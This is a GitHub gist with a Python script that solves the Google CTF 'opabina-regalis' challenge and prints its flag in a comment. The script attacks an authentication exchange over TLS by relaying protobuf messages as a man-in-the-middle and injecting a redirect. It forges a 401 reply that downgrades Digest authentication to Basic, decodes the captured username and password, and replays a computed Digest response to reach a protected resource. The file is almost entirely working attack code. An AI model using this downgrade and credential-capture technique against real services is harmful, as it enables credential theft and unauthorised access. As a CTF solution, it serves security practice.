Skip to content

Instantly share code, notes, and snippets.

@CreateRemoteThread

CreateRemoteThread/google-opabina.py

Created May 2, 2016 10:57
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save CreateRemoteThread/7bc512785c842e474e550d541e2c2542 to your computer and use it in GitHub Desktop.
Save CreateRemoteThread/7bc512785c842e474e550d541e2c2542 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
google-opabina.py
#!/usr/bin/python
# CTF{golang_reversing_can_eat_my_balls_and_so_can_protocol_buffers}
try:
import hashlib as md5
except ImportError:
import md5
import random
import types
import dicks
import sys
import base64
import opabina_pb2
import struct
import socket
import ssl
# TEST BUILDING AUTH CHALLENGE
# TEST_AUTHSTRING = "Digest realm=\"testrealm@host.com\",qop=\"auth\",nonce=\"dd3b173f21ae8266\",opaque=\"dd3b173f21ae8266\""
# HERPADERP
#partial_digest = dicks.calculate_partial_digest("google.ctf","In the realm of hackers","1932403934.1443610966.703716842")
#request_digest = dicks.calculate_request_digest("GET",partial_digest,uri="/protected/secret",nonce="dcd98b7102dd2f0e8b11d0f600bfb0c093",nonce_count=1,client_nonce="0a4f113b")
#print request_digest
#print "6629fae49393a05397450978507c4ef1"
# print "DW ABOUT THE ABOVE JUST TESTING LOL"
partial_digest = ""
request_digest = ""
HOST="ssl-added-and-removed-here.ctfcompetition.com"
PORT=13001
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(10)
wrappedSocket = ssl.wrap_socket(sock)
wrappedSocket.connect((HOST,PORT))
def nice_recv(ws):
d = ws.recv(1024)
l = struct.unpack("<i",d[0:4])
pb = opabina_pb2.Exchange()
pb.ParseFromString(d[4:])
print pb
return pb
# d = wrappedSocket.recv(1024)
# print d
# length_marshalled = struct.unpack("<i",d[0:4])
# print length_marshalled
# pb = opabina_pb2.Exchange()
# pb.ParseFromString(d[4:])
# print "-- RECEIVED %d --" % len(d)
# rint pb
nice_recv(wrappedSocket)
# del pb
print "-- CREATING RESPONSE --"
def nice_send(s,data):
d = data.SerializeToString()
l = struct.pack("<i",len(d))
s.send(l+d)
pb = opabina_pb2.Exchange()
pb.request.ver = 0
pb.request.uri = "/protected/not-secret"
h = pb.request.headers.add()
h.key = "User-Agent"
h.value = "opabina-regalis.go"
# hv = pb.request.headers.add()
# hv.key = "Host"
# hv.value = "localhost"
print "SENDING SERVER REQUEST FOR /PROTECTED/NOT-SECRET"
nice_send(wrappedSocket,pb)
print "RECEIVING...."
pb = nice_recv(wrappedSocket)
print "FORWARDING SERVER->CLIENT AUTHENTICATION REQUEST..."
nice_send(wrappedSocket,pb)
pb = nice_recv(wrappedSocket)
print "FORWARDING CLIENT->SERVER AUTHENTICATION REQUEST..."
nice_send(wrappedSocket,pb)
pb = nice_recv(wrappedSocket)
print "THIS ISNT THE TOKEN YOURE LOOKING FOR..."
pb = opabina_pb2.Exchange()
pb.reply.status = 302
h = pb.reply.headers.add()
h.key = "Location"
h.value = "/protected/secret"
print "REDIRECTING USER TO /PROTECTED/SECRET, YOU SHOULD SEE A GET REQUEST..."
nice_send(wrappedSocket,pb)
pb = nice_recv(wrappedSocket)
nice_send(wrappedSocket,pb)
print "AUTH REQUEST NEXT?"
pb = nice_recv(wrappedSocket)
nice_send(wrappedSocket,pb)
pb = nice_recv(wrappedSocket)
nice_send(wrappedSocket,pb)
pb = nice_recv(wrappedSocket)
sys.exit(0)
rnonce=""
request_digest = ""
for h in pb.reply.headers:
if h.key == "WWW-Authenticate":
print "+++ DIGEST AUTH: %s" % h.value
import re
m = re.search("nonce=\"(.+?)\"",h.value)
print "+++ MATCH: %s" % m.groups(0)
(rnoncex,) = m.groups(0)
rnonce=rnoncex
# sys.exit(0)
print "-- DOWNGRADING TO FORCE BASIC HEADER"
pb = opabina_pb2.Exchange()
pb.reply.status=401
h = pb.reply.headers.add()
h.key = "Server"
h.value = "opabina-regalis.go"
h_loc = pb.reply.headers.add()
h_loc.key = "Location"
h_loc.value = "/protected/secret"
h2 = pb.reply.headers.add()
h2.key = "WWW-Authenticate"
h2.value = "Basic realm=\"In the realm of hackers\""
nice_send(wrappedSocket,pb)
print "RECEIVING...."
d = wrappedSocket.recv(1024)
length_marshalled = struct.unpack("<i",d[0:4])
print length_marshalled
del pb
pb = opabina_pb2.Exchange()
pb.ParseFromString(d[4:])
print pb
for h in pb.request.headers:
if h.key == "Authorization":
b = h.value
(basic,authb64) = b.split(" ")
(user,pw) = base64.b64decode(authb64).split(":")
print "USER:%s PW:%s" % (user,pw)
# sys.exit(0)
partial_digest = dicks.calculate_partial_digest("google.ctf","In the realm of hackers",pw)
request_digest = dicks.calculate_request_digest("GET",partial_digest,uri="/protected/secret",nonce=rnonce,nonce_count=1,client_nonce="0a4f113b")
print "-- REPLYING WITH AUTHENTICATION VALUE --"
pb = opabina_pb2.Exchange()
pb.request.ver = 0
pb.request.uri = "/protected/secret"
h = pb.request.headers.add()
h.key = "User-Agent"
h.value = "opabina-regalis.go"
h_auth = pb.request.headers.add()
h_auth.key = "Authorization"
h_auth.value = "Digest username=\"google.ctf\",realm=\"In the realm of hackers\",nonce=\"" + rnonce + "\",uri=\"/protected/secret\",qop=auth,nc=00000001,cnonce=\"0a4f113b\",response=\""+request_digest+"\",opaque=\""+request_digest + "\""
print pb
nice_send(wrappedSocket,pb)
print "RECEIVING...."
d = wrappedSocket.recv(1024)
length_marshalled = struct.unpack("<i",d[0:4])
print length_marshalled
del pb
pb = opabina_pb2.Exchange()
pb.ParseFromString(d[4:])
print pb
wrappedSocket.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment